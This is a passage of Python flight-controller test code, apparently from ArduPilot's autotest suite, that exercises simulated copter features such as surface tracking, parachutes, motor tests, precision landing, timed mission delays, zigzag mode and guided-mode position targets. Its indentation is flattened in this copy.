if not self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("Did not see expected RFND message")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_terrain_spline_mission(self):
self.set_parameter("AUTO_OPTIONS", 3)
self.set_parameter("TERRAIN_ENABLE", 0)
self.load_mission("wp.txt")
self.change_mode('AUTO')
self.wait_ready_to_arm()
self.arm_vehicle()
self.wait_waypoint(4, 4)
self.wait_disarmed()
def test_surface_tracking(self):
ex = None
self.context_push()
# we must start mavproxy here as otherwise we can't get the
# terrain database tiles - this leads to random failures in
# CI!
mavproxy = self.start_mavproxy()
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("RC9_OPTION", 10) # rangefinder
self.set_rc(9, 2000)
self.reboot_sitl() # needed for both rangefinder and initial position
self.assert_vehicle_location_is_at_startup_location()
self.takeoff(10, mode="LOITER")
lower_surface_pos = mavutil.location(-35.362421, 149.164534, 584, 270)
here = self.mav.location()
bearing = self.get_bearing(here, lower_surface_pos)
self.change_mode("GUIDED")
self.guided_achieve_heading(bearing)
self.change_mode("LOITER")
self.delay_sim_time(2)
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
orig_absolute_alt_mm = m.alt
self.progress("Original alt: absolute=%f" % orig_absolute_alt_mm)
self.progress("Flying somewhere which surface is known lower compared to takeoff point")
self.set_rc(2, 1450)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 200:
raise NotAchievedException("Did not reach lower point")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
x = mavutil.location(m.lat/1e7, m.lon/1e7, m.alt/1e3, 0)
dist = self.get_distance(x, lower_surface_pos)
delta = (orig_absolute_alt_mm - m.alt)/1000.0
self.progress("Distance: %fm abs-alt-delta: %fm" %
(dist, delta))
if dist < 15:
if delta < 0.8:
raise NotAchievedException("Did not dip in altitude as expected")
break
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
self.disarm_vehicle(force=True)
ex = e
self.stop_mavproxy(mavproxy)
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_rangefinder_switchover(self):
"""test that the EKF correctly handles the switchover between baro and rangefinder"""
ex = None
self.context_push()
try:
self.set_analog_rangefinder_parameters()
self.set_parameters({
"RNGFND1_MAX_CM": 1500
})
# configure EKF to use rangefinder for altitude at low altitudes
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_RNG_USE_HGT", 70)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_RNG_USE_HGT", 70)
self.reboot_sitl() # needed for both rangefinder and initial position
self.assert_vehicle_location_is_at_startup_location()
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(3, 1800)
self.set_rc(2, 1200)
# wait till we get to 50m
self.wait_altitude(50, 52, True, 60)
self.change_mode("RTL")
# wait till we get to 25m
self.wait_altitude(25, 27, True, 120)
# level up
self.set_rc(2, 1500)
self.wait_altitude(14, 15, relative=True)
self.wait_rtl_complete()
except Exception as e:
self.print_exception_caught(e)
self.disarm_vehicle(force=True)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_parachute(self):
self.set_rc(9, 1000)
self.set_parameter("CHUTE_ENABLED", 1)
self.set_parameter("CHUTE_TYPE", 10)
self.set_parameter("SERVO9_FUNCTION", 27)
self.set_parameter("SIM_PARA_ENABLE", 1)
self.set_parameter("SIM_PARA_PIN", 9)
self.progress("Test triggering parachute in mission")
self.load_mission("copter_parachute_mission.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1600)
self.wait_statustext('BANG', timeout=60)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("Test triggering with mavlink message")
self.takeoff(20)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_PARACHUTE,
2, # release
0,
0,
0,
0,
0,
0)
self.wait_statustext('BANG', timeout=60)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("Testing three-position switch")
self.set_parameter("RC9_OPTION", 23) # parachute 3pos
self.progress("Test manual triggering")
self.takeoff(20)
self.set_rc(9, 2000)
self.wait_statustext('BANG', timeout=60)
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_push()
self.progress("Crashing with 3pos switch in enable position")
self.takeoff(40)
self.set_rc(9, 1500)
self.set_parameter("SIM_ENGINE_MUL", 0)
self.set_parameter("SIM_ENGINE_FAIL", 1)
self.wait_statustext('BANG', timeout=60)
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.progress("Crashing with 3pos switch in disable position")
loiter_alt = 10
self.takeoff(loiter_alt, mode='LOITER')
self.set_rc(9, 1100)
self.set_parameter("SIM_ENGINE_MUL", 0)
self.set_parameter("SIM_ENGINE_FAIL", 1)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + 5:
m = self.mav.recv_match(type='STATUSTEXT', blocking=True, timeout=1)
if m is None:
continue
if "BANG" in m.text:
self.set_rc(9, 1000)
self.reboot_sitl()
raise NotAchievedException("Parachute deployed when disabled")
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
def test_motortest(self, timeout=60):
self.start_subtest("Testing PWM output")
pwm_in = 1300
# default frame is "+" - start motor of 2 is "B", which is
# motor 1... see
# https://ardupilot.org/copter/docs/connect-escs-and-motors.html
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOTOR_TEST,
2, # start motor
mavutil.mavlink.MOTOR_TEST_THROTTLE_PWM,
pwm_in, # pwm-to-output
2, # timeout in seconds
2, # number of motors to output
0, # compass learning
0,
timeout=timeout)
# long timeouts here because there's a pause before we start motors
self.wait_servo_channel_value(1, pwm_in, timeout=10)
self.wait_servo_channel_value(4, pwm_in, timeout=10)
self.wait_statustext("finished motor test")
self.end_subtest("Testing PWM output")
self.start_subtest("Testing percentage output")
percentage = 90.1
# since MOT_SPIN_MIN and MOT_SPIN_MAX are not set, the RC3
# min/max are used.
expected_pwm = 1000 + (self.get_parameter("RC3_MAX") - self.get_parameter("RC3_MIN")) * percentage/100.0
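        # worked numbers with default RC3 range 1100..1900:
        # 1000 + 800 * 0.901 = 1720.8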
self.progress("expected pwm=%f" % expected_pwm)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOTOR_TEST,
2, # start motor
mavutil.mavlink.MOTOR_TEST_THROTTLE_PERCENT,
percentage, # pwm-to-output
2, # timeout in seconds
2, # number of motors to output
0, # compass learning
0,
timeout=timeout)
self.wait_servo_channel_value(1, expected_pwm, timeout=10)
self.wait_servo_channel_value(4, expected_pwm, timeout=10)
self.wait_statustext("finished motor test")
self.end_subtest("Testing percentage output")
def fly_precision_sitl(self):
"""Use SITL PrecLand backend precision messages to land aircraft."""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
self.set_parameter("PLND_TYPE", 4)
self.set_analog_rangefinder_parameters()
self.set_parameter("SIM_SONAR_SCALE", 12)
start = self.mav.location()
target = start
(target.lat, target.lng) = mavextra.gps_offset(start.lat, start.lng, 4, -4)
self.progress("Setting target to %f %f" % (target.lat, target.lng))
self.set_parameter("SIM_PLD_ENABLE", 1)
self.set_parameter("SIM_PLD_LAT", target.lat)
self.set_parameter("SIM_PLD_LON", target.lng)
self.set_parameter("SIM_PLD_HEIGHT", 0)
self.set_parameter("SIM_PLD_ALT_LMT", 15)
self.set_parameter("SIM_PLD_DIST_LMT", 10)
self.reboot_sitl()
self.progress("Waiting for location")
self.zero_throttle()
self.takeoff(10, 1800)
self.change_mode("LAND")
self.wait_landed_and_disarmed()
self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
new_pos = self.mav.location()
delta = self.get_distance(target, new_pos)
self.progress("Landed %f metres from target position" % delta)
max_delta = 1
if delta > max_delta:
raise NotAchievedException("Did not land close enough to target position (%fm > %fm" % (delta, max_delta))
if not self.current_onboard_log_contains_message("PL"):
raise NotAchievedException("Did not see expected PL message")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.zero_throttle()
self.context_pop()
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
def get_system_clock_utc(self, time_seconds):
# this is a copy of ArduPilot's AP_RTC function!
# separate time into ms, sec, min, hour and days but all expressed
# in milliseconds
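        # worked example (illustrative): time_seconds=90061 (one day plus
        # 01:01:01) -> time_ms=90061000; ms=0, sec_ms=1000, min_ms=60000,
        # hour_ms=3600000 -> returns (1, 1, 1, 0)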
time_ms = time_seconds * 1000
ms = time_ms % 1000
sec_ms = (time_ms % (60 * 1000)) - ms
min_ms = (time_ms % (60 * 60 * 1000)) - sec_ms - ms
hour_ms = (time_ms % (24 * 60 * 60 * 1000)) - min_ms - sec_ms - ms
# convert times as milliseconds into appropriate units
secs = sec_ms / 1000
mins = min_ms / (60 * 1000)
hours = hour_ms / (60 * 60 * 1000)
return (hours, mins, secs, 0)
def calc_delay(self, seconds, delay_for_seconds):
# delay-for-seconds has to be long enough that we're at the
# waypoint before that time. Otherwise we'll try to wait a
# day....
if delay_for_seconds >= 3600:
raise ValueError("Won't handle large delays")
(hours,
mins,
secs,
ms) = self.get_system_clock_utc(seconds)
self.progress("Now is %uh %um %us" % (hours, mins, secs))
        secs += delay_for_seconds # add the requested delay
mins += int(secs/60)
secs %= 60
hours += int(mins / 60)
mins %= 60
if hours > 24:
raise ValueError("Way too big a delay")
self.progress("Delay until %uh %um %us" %
(hours, mins, secs))
return (hours, mins, secs, 0)
def reset_delay_item(self, seq, seconds_in_future):
frame = mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT
command = mavutil.mavlink.MAV_CMD_NAV_DELAY
# retrieve mission item and check it:
tried_set = False
hours = None
mins = None
secs = None
while True:
self.progress("Requesting item")
self.mav.mav.mission_request_send(1,
1,
seq)
st = self.mav.recv_match(type='MISSION_ITEM',
blocking=True,
timeout=1)
if st is None:
continue
print("Item: %s" % str(st))
have_match = (tried_set and
st.seq == seq and
st.command == command and
st.param2 == hours and
st.param3 == mins and
st.param4 == secs)
if have_match:
return
self.progress("Mission mismatch")
m = None
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 3:
raise NotAchievedException(
"Did not receive MISSION_REQUEST")
self.mav.mav.mission_write_partial_list_send(1,
1,
seq,
seq)
m = self.mav.recv_match(type='MISSION_REQUEST',
blocking=True,
timeout=1)
if m is None:
continue
if m.seq != st.seq:
continue
break
self.progress("Sending absolute-time mission item")
# we have to change out the delay time...
now = self.mav.messages["SYSTEM_TIME"]
if now is None:
raise PreconditionFailedException("Never got SYSTEM_TIME")
if now.time_unix_usec == 0:
raise PreconditionFailedException("system time is zero")
(hours, mins, secs, ms) = self.calc_delay(now.time_unix_usec/1000000, seconds_in_future)
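        # for MAV_CMD_NAV_DELAY, with param1 (a relative delay in seconds)
        # zeroed, params 2-4 give the absolute UTC hour/minute/second at
        # which the mission should resume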
self.mav.mav.mission_item_send(
1, # target system
1, # target component
seq, # seq
frame, # frame
command, # command
0, # current
1, # autocontinue
0, # p1 (relative seconds)
hours, # p2
mins, # p3
secs, # p4
0, # p5
0, # p6
0) # p7
tried_set = True
ack = self.mav.recv_match(type='MISSION_ACK',
blocking=True,
timeout=1)
self.progress("Received ack: %s" % str(ack))
def fly_nav_delay_abstime(self):
"""fly a simple mission that has a delay in it"""
self.fly_nav_delay_abstime_x(87)
def fly_nav_delay_abstime_x(self, delay_for, expected_delay=None):
"""fly a simple mission that has a delay in it, expect a delay"""
if expected_delay is None:
expected_delay = delay_for
self.load_mission("copter_nav_delay.txt")
self.change_mode("LOITER")
self.wait_ready_to_arm()
delay_item_seq = 3
self.reset_delay_item(delay_item_seq, delay_for)
delay_for_seconds = delay_for
reset_at_m = self.mav.recv_match(type='SYSTEM_TIME', blocking=True)
reset_at = reset_at_m.time_unix_usec/1000000
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
count_stop = -1
tstart = self.get_sim_time()
while self.armed(): # we RTL at end of mission
now = self.get_sim_time_cached()
if now - tstart > 240:
raise AutoTestTimeoutException("Did not disarm as expected")
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
at_delay_item = ""
if m.seq == delay_item_seq:
at_delay_item = "(delay item)"
self.progress("MISSION_CURRENT.seq=%u %s" % (m.seq, at_delay_item))
if m.seq > delay_item_seq:
if count_stop == -1:
count_stop_m = self.mav.recv_match(type='SYSTEM_TIME',
blocking=True)
count_stop = count_stop_m.time_unix_usec/1000000
calculated_delay = count_stop - reset_at
error = abs(calculated_delay - expected_delay)
self.progress("Stopped for %u seconds (want >=%u seconds)" %
(calculated_delay, delay_for_seconds))
if error > 2:
raise NotAchievedException("delay outside expectations")
def fly_nav_takeoff_delay_abstime(self):
"""make sure taking off at a specific time works"""
self.load_mission("copter_nav_delay_takeoff.txt")
self.change_mode("LOITER")
self.wait_ready_to_arm()
delay_item_seq = 2
delay_for_seconds = 77
self.reset_delay_item(delay_item_seq, delay_for_seconds)
reset_at = self.get_sim_time_cached()
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
        # should not take off for at least 77 seconds
tstart = self.get_sim_time()
took_off = False
while self.armed():
now = self.get_sim_time_cached()
if now - tstart > 200:
# timeout
break
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
now = self.get_sim_time_cached()
self.progress("%s" % str(m))
if m.seq > delay_item_seq:
if not took_off:
took_off = True
delta_time = now - reset_at
if abs(delta_time - delay_for_seconds) > 2:
raise NotAchievedException((
"Did not take off on time "
"measured=%f want=%f" %
(delta_time, delay_for_seconds)))
if not took_off:
raise NotAchievedException("Did not take off")
def fly_zigzag_mode(self):
'''test zigzag mode'''
# set channel 8 for zigzag savewp and recentre it
self.set_parameter("RC8_OPTION", 61)
self.takeoff(alt_min=5, mode='LOITER')
ZIGZAG = 24
j = 0
slowdown_speed = 0.3 # because Copter takes a long time to actually stop
self.start_subtest("Conduct ZigZag test for all 4 directions")
while j < 4:
self.progress("## Align heading with the run-way (j=%d)##" % j)
self.set_rc(8, 1500)
self.set_rc(4, 1420)
self.wait_heading(352-j*90)
self.set_rc(4, 1500)
self.change_mode(ZIGZAG)
self.progress("## Record Point A ##")
self.set_rc(8, 1100) # record point A
self.set_rc(1, 1700) # fly side-way for 20m
self.wait_distance(20)
self.set_rc(1, 1500)
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## Record Point A ##")
self.set_rc(8, 1500) # pilot always have to cross mid position when changing for low to high position
self.set_rc(8, 1900) # record point B
i = 1
while i < 2:
self.start_subtest("Run zigzag A->B and B->A (i=%d)" % i)
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300)
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector BA ##")
self.set_rc(8, 1100)
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300) # fly forward for 10 meter
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector AB ##")
self.set_rc(8, 1900)
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
i = i + 1
# test the case when pilot switch to manual control during the auto flight
self.start_subtest("test the case when pilot switch to manual control during the auto flight")
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300) # fly forward for 10 meter
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
        self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector BA ##")
self.set_rc(8, 1100) # switch to low position, auto execute vector BA
self.wait_distance(8) # purposely switch to manual halfway
self.set_rc(8, 1500)
self.wait_groundspeed(0, slowdown_speed) # copter should slow down here
self.progress("## Manual control to fly forward ##")
self.set_rc(2, 1300) # manual control to fly forward
self.wait_distance(8)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## continue vector BA ##")
self.set_rc(8, 1100) # copter should continue mission here
self.wait_distance(8) # wait for it to finish rest of BA
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector AB ##")
self.set_rc(8, 1900) # switch to execute AB again
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.change_mode('LOITER')
j = j + 1
self.do_RTL()
def test_setting_modes_via_modeswitch(self):
self.context_push()
ex = None
try:
fltmode_ch = 5
self.set_parameter("FLTMODE_CH", fltmode_ch)
self.set_rc(fltmode_ch, 1000) # PWM for mode1
testmodes = [("FLTMODE1", 4, "GUIDED", 1165),
("FLTMODE2", 13, "SPORT", 1295),
("FLTMODE3", 6, "RTL", 1425),
("FLTMODE4", 7, "CIRCLE", 1555),
("FLTMODE5", 1, "ACRO", 1685),
("FLTMODE6", 17, "BRAKE", 1815),
]
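            # the PWM values above are chosen to fall inside each of the six
            # flight-mode-switch slots (boundaries near 1230/1360/1490/1620/1749)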
for mode in testmodes:
(parm, parm_value, name, pwm) = mode
self.set_parameter(parm, parm_value)
for mode in reversed(testmodes):
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
for mode in testmodes:
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
for mode in reversed(testmodes):
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_setting_modes_via_auxswitch(self):
self.context_push()
ex = None
try:
fltmode_ch = int(self.get_parameter("FLTMODE_CH"))
self.set_rc(fltmode_ch, 1000)
self.wait_mode("CIRCLE")
self.set_rc(9, 1000)
self.set_rc(10, 1000)
self.set_parameter("RC9_OPTION", 18) # land
self.set_parameter("RC10_OPTION", 55) # guided
self.set_rc(9, 1900)
self.wait_mode("LAND")
self.set_rc(10, 1900)
self.wait_mode("GUIDED")
self.set_rc(10, 1000) # this re-polls the mode switch
self.wait_mode("CIRCLE")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def fly_guided_stop(self,
timeout=20,
groundspeed_tolerance=0.05,
climb_tolerance=0.01):
"""stop the vehicle moving in guided mode"""
self.progress("Stopping vehicle")
tstart = self.get_sim_time()
# send a position-control command
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_BODY_NED,
0b1111111111111000, # mask specifying use-only-x-y-z
0, # x
0, # y
0, # z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
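        # a zero position offset in MAV_FRAME_BODY_NED commands the vehicle
        # to hold its current position, i.e. to stop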
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Vehicle did not stop")
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
print("%s" % str(m))
if (m.groundspeed < groundspeed_tolerance and
m.climb < climb_tolerance):
break
def fly_guided_move_global_relative_alt(self, lat, lon, alt):
startpos = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
self.mav.mav.set_position_target_global_int_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT,
0b1111111111111000, # mask specifying use-only-lat-lon-alt
lat, # lat
lon, # lon
alt, # alt
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 200:
raise NotAchievedException("Did not move far enough")
# send a position-control command
pos = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
delta = self.get_distance_int(startpos, pos)
self.progress("delta=%f (want >10)" % delta)
if delta > 10:
break
def fly_guided_move_local(self, x, y, z_up, timeout=100):
"""move the vehicle using MAVLINK_MSG_ID_SET_POSITION_TARGET_LOCAL_NED"""
startpos = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
self.progress("startpos=%s" % str(startpos))
tstart = self.get_sim_time()
# send a position-control command
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111111000, # mask specifying use-only-x-y-z
x, # x
y, # y
            -z_up, # z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not start to move")
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
print("%s" % m)
if m.groundspeed > 0.5:
break
self.progress("Waiting for vehicle to stop...")
self.wait_groundspeed(1, 100, timeout=timeout)
stoppos = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
self.progress("stop_pos=%s" % str(stoppos))
x_achieved = stoppos.x - startpos.x
if x_achieved - x > 1:
raise NotAchievedException("Did not achieve x position: want=%f got=%f" % (x, x_achieved))
y_achieved = stoppos.y - startpos.y
if y_achieved - y > 1:
raise NotAchievedException("Did not achieve y position: want=%f got=%f" % (y, y_achieved))
z_achieved = stoppos.z - startpos.z
if z_achieved - z_up > 1:
raise NotAchievedException("Did not achieve z position: want=%f got=%f" % (z_up, z_achieved))
def test_guided_local_position_target(self, x, y, z_up):
""" Check target position being received by vehicle """
# set POSITION_TARGET_LOCAL_NED message rate using SET_MESSAGE_INTERVAL
self.progress("Setting local target in NED: (%f, %f, %f)" % (x, y, -z_up))
self.progress("Setting rate to 1 Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 1)
# set position target
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111111000, # mask specifying use only xyz
x, # x
y, # y
-z_up, # z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=2)
self.progress("Received local target: %s" % str(m))
if not (m.type_mask == 0xFFF8 or m.type_mask == 0x0FF8):
raise NotAchievedException("Did not receive proper mask: expected=65528 or 4088, got=%u" % m.type_mask)
if x - m.x > 0.1:
raise NotAchievedException("Did not receive proper target position x: wanted=%f got=%f" % (x, m.x))
if y - m.y > 0.1:
raise NotAchievedException("Did not receive proper target position y: wanted=%f got=%f" % (y, m.y))
if z_up - (-m.z) > 0.1:
raise NotAchievedException("Did not receive proper target position z: wanted=%f got=%f" % (z_up, -m.z))
def test_guided_local_velocity_target(self, vx, vy, vz_up, timeout=3):
" Check local target velocity being recieved by vehicle "
self.progress("Setting local NED velocity target: (%f, %f, %f)" % (vx, vy, -vz_up))
self.progress("Setting POSITION_TARGET_LOCAL_NED message rate to 10Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 10)
# Drain old messages and ignore the ramp-up to the required target velocity
tstart = self.get_sim_time()
while self.get_sim_time_cached() - tstart < timeout:
# send velocity-control command
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111000111, # mask specifying use only vx,vy,vz
0, # x
0, # y
0, # z
vx, # vx
vy, # vy
-vz_up, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=1)
if m is None:
raise NotAchievedException("Did not receive any message for 1 sec")
self.progress("Received local target: %s" % str(m))
# Check the last received message
if not (m.type_mask == 0xFFC7 or m.type_mask == 0x0FC7):
raise NotAchievedException("Did not receive proper mask: expected=65479 or 4039, got=%u" % m.type_mask)
if vx - m.vx > 0.1:
raise NotAchievedException("Did not receive proper target velocity vx: wanted=%f got=%f" % (vx, m.vx))
if vy - m.vy > 0.1:
raise NotAchievedException("Did not receive proper target velocity vy: wanted=%f got=%f" % (vy, m.vy))
if vz_up - (-m.vz) > 0.1:
raise NotAchievedException("Did not receive proper target velocity vz: wanted=%f got=%f" % (vz_up, -m.vz))
self.progress("Received proper target velocity commands")
def test_position_target_message_mode(self):
" Ensure that POSITION_TARGET_LOCAL_NED messages are sent in Guided Mode only "
self.hover()
self.change_mode('LOITER')
self.progress("Setting POSITION_TARGET_LOCAL_NED message rate to 10Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 10)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + 5:
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=1)
if m is None:
continue
raise NotAchievedException("Received POSITION_TARGET message in LOITER mode: %s" % str(m))
self.progress("Did not receive any POSITION_TARGET_LOCAL_NED message in LOITER mode. Success")
def earth_to_body(self, vector):
r = mavextra.rotation(self.mav.messages["ATTITUDE"]).invert()
# print("r=%s" % str(r))
return r * vector
def loiter_to_ne(self, x, y, z, timeout=40):
'''loiter to x, y, z from origin (in metres), z is *up*'''
dest_ned = rotmat.Vector3(x, y, -z)
tstart = self.get_sim_time()
success_start = -1
while True:
now = self.get_sim_time_cached()
if now - tstart > timeout:
raise NotAchievedException("Did not loiter to ne!")
m_pos = self.mav.recv_match(type='LOCAL_POSITION_NED',
blocking=True)
pos_ned = rotmat.Vector3(m_pos.x, m_pos.y, m_pos.z)
# print("dest_ned=%s" % str(dest_ned))
# print("pos_ned=%s" % str(pos_ned))
delta_ef = dest_ned - pos_ned
# print("delta_ef=%s" % str(delta_ef))
# determine if we've successfully navigated to close to
# where we should be:
dist = math.sqrt(delta_ef.x * delta_ef.x + delta_ef.y * delta_ef.y)
dist_max = 0.1
self.progress("dist=%f want <%f" % (dist, dist_max))
if dist < dist_max:
# success! We've gotten within our target distance
if success_start == -1:
success_start = now
elif now - success_start > 10:
self.progress("Yay!")
break
else:
success_start = -1
delta_bf = self.earth_to_body(delta_ef)
# print("delta_bf=%s" % str(delta_bf))
angle_x = math.atan2(delta_bf.y, delta_bf.z)
angle_y = -math.atan2(delta_bf.x, delta_bf.z)
distance = math.sqrt(delta_bf.x * delta_bf.x +
delta_bf.y * delta_bf.y +
delta_bf.z * delta_bf.z)
# att = self.mav.messages["ATTITUDE"]
# print("r=%f p=%f y=%f" % (math.degrees(att.roll), math.degrees(att.pitch), math.degrees(att.yaw)))
# print("angle_x=%s angle_y=%s" % (str(math.degrees(angle_x)), str(math.degrees(angle_y))))
# print("distance=%s" % str(distance))
self.mav.mav.landing_target_send(
0, # time_usec
1, # target_num
mavutil.mavlink.MAV_FRAME_GLOBAL, # frame; AP ignores
angle_x, # angle x (radians)
angle_y, # angle y (radians)
distance, # distance to target
0.01, # size of target in radians, X-axis
0.01 # size of target in radians, Y-axis
)
def fly_payload_place_mission(self):
"""Test payload placing in auto."""
self.context_push()
ex = None
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("GRIP_ENABLE", 1)
self.set_parameter("GRIP_TYPE", 1)
self.set_parameter("SIM_GRPS_ENABLE", 1)
self.set_parameter("SIM_GRPS_PIN", 8)
self.set_parameter("SERVO8_FUNCTION", 28)
self.set_parameter("RC9_OPTION", 19)
self.reboot_sitl()
self.set_rc(9, 2000)
# load the mission:
self.load_mission("copter_payload_place.txt")
self.progress("Waiting for location")
self.mav.location()
self.zero_throttle()
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1500)
self.wait_text("Gripper load releas", timeout=90)
self.wait_disarmed()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
def fly_guided_change_submode(self):
""""Ensure we can move around in guided after a takeoff command."""
'''start by disabling GCS failsafe, otherwise we immediately disarm
due to (apparently) not receiving traffic from the GCS for
too long. This is probably a function of --speedup'''
self.set_parameter("FS_GCS_ENABLE", 0)
self.set_parameter("DISARM_DELAY", 0) # until traffic problems are fixed
self.change_mode("GUIDED")
self.wait_ready_to_arm()
self.arm_vehicle()
self.user_takeoff(alt_min=10)
self.start_subtest("yaw through absolute angles using MAV_CMD_CONDITION_YAW")
self.guided_achieve_heading(45)
self.guided_achieve_heading(135)
self.start_subtest("move the vehicle using set_position_target_global_int")
# the following numbers are 5-degree-latitude and 5-degrees
# longitude - just so that we start to really move a lot.
self.fly_guided_move_global_relative_alt(5, 5, 10)
self.start_subtest("move the vehicle using MAVLINK_MSG_ID_SET_POSITION_TARGET_LOCAL_NED")
self.fly_guided_stop(groundspeed_tolerance=0.1)
self.fly_guided_move_local(5, 5, 10)
self.start_subtest("Check target position received by vehicle using SET_MESSAGE_INTERVAL")
self.test_guided_local_position_target(5, 5, 10)
self.test_guided_local_velocity_target(2, 2, 1)
self.test_position_target_message_mode()
self.do_RTL()
def test_gripper_mission(self):
self.context_push()
ex = None
try:
